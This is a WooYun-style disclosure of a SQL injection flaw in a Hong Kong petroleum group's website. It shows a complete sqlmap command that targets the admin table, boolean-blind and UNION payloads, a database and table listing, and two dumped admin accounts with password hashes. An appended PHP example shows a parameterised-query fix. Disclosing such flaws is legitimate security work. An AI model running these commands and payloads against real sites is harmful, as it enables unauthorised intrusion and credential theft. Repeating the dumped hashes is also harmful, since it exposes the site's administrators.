
SQL injection vulnerability in a site of 香港百田石油国际集团 (login passwords obtainable)

2015-11-30 04:25

Tested with sqlmap.

Test URL: http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional

Code:
python sqlmap.py -u "http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional" -p news_id --technique=BU --random-agent -D ppig -T admin -C email,id,name,password --dump

Proof of vulnerability:

Code:
---
Parameter: news_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news_id=126 AND 9637=9637&pageid=1&Language=traditional

    Type: UNION query
    Title: MySQL UNION query (70) - 22 columns
    Payload: news_id=-5621 UNION ALL SELECT 70,70,70,CONCAT(0x71786a7a71,0x6c6a49746c44596a655a,0x716b627171),70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70#&pageid=1&Language=traditional
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5
back-end DBMS: MySQL >= 5.0.0
current user: 'ppig@**.**.**.**'
current user is DBA: False

Code:
available databases [2]:
[*] information_schema
[*] ppig

Code:
Database: ppig
[29 tables]
+---------------+
| user          |
| work          |
| address       |
| admin         |
| applications  |
| books         |
| books_res     |
| cat           |
| category      |
| connect_us    |
| counts        |
| ext_info      |
| gallery       |
| gallery_photo |
| jsfw_cat      |
| jsfw_news     |
| lang          |
| member        |
| message       |
| news          |
| product       |
| table_down    |
| tips          |
| tzz_cat       |
| unit          |
| video         |
| xgmy_cat      |
| xgmy_news     |
| years         |
+---------------+

Code:
Database: ppig
Table: admin
[5 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| address_id | numeric     |
| email      | non-numeric |
| id         | numeric     |
| name       | non-numeric |
| password   | non-numeric |
+------------+-------------+

Code:
Database: ppig
Table: admin
[2 entries]
+-----------------+----+--------+----------------------------------+
| email           | id | name   | password                         |
+-----------------+----+--------+----------------------------------+
| admin@localhost | 41 | admin  | 759613b741648bd91c42268306c7e140 |
| admin           | 52 | hklist | a83f0eb30289b6b99329c1610226b6dd |
+-----------------+----+--------+----------------------------------+

Fix:

Add filtering.
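
One way to implement the filtering named in the fix, as an added example that is not code from the original report or from the affected site: strictly validate news_id, pageid and Language, then bind the values through a PDO prepared statement. The tips table and its columns, the language allow-list and the in-memory SQLite database standing in for MySQL are assumptions.

```php
<?php
declare(strict_types=1);
// Added example. Table/column names, the language allow-list and the in-memory
// SQLite stand-in for the MySQL back end are assumptions, not the site's code.
const LANGUAGES = ['traditional', 'simplified', 'english'];

/** Validate the GET parameters; return typed values, or null if any is malformed. */
function validate_params(array $get): ?array
{
    $intOpts = ['options' => ['min_range' => 1]];
    $newsId = filter_var($get['news_id'] ?? null, FILTER_VALIDATE_INT, $intOpts);
    $pageId = filter_var($get['pageid'] ?? null, FILTER_VALIDATE_INT, $intOpts);
    $lang = $get['Language'] ?? '';
    if ($newsId === false || $pageId === false || !in_array($lang, LANGUAGES, true)) {
        return null;
    }
    return ['news_id' => $newsId, 'pageid' => $pageId, 'lang' => $lang];
}

/** Look up one row with values bound as parameters, never concatenated into SQL. */
function fetch_tip(PDO $pdo, array $p): ?array
{
    $stmt = $pdo->prepare('SELECT id, title FROM tips WHERE id = :id AND lang = :lang');
    $stmt->bindValue(':id', $p['news_id'], PDO::PARAM_INT);
    $stmt->bindValue(':lang', $p['lang'], PDO::PARAM_STR);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data. In production use a mysql: DSN, set
// PDO::ATTR_EMULATE_PREPARES => false, and connect with a least-privilege account.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec("CREATE TABLE tips (id INTEGER PRIMARY KEY, lang TEXT, title TEXT)");
$pdo->exec("INSERT INTO tips VALUES (126, 'traditional', 'constructed sample row')");
$requests = [
    ['news_id' => '126', 'pageid' => '1', 'Language' => 'traditional'],
    // news_id value taken from the boolean-based payload in the sqlmap output
    ['news_id' => '126 AND 9637=9637', 'pageid' => '1', 'Language' => 'traditional'],
];
foreach ($requests as $get) {
    $params = validate_params($get);
    if ($params === null) {
        echo '400 Bad Request: news_id=', json_encode($get['news_id']), "\n";
        continue;
    }
    $row = fetch_tip($pdo, $params);
    echo $row === null ? "404 Not Found\n" : "200 OK: {$row['title']}\n";
}
```

Runs under the PHP CLI with the pdo_sqlite extension enabled.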

Source: www.wooyun.org/bugs/wooyun-2015-0146083
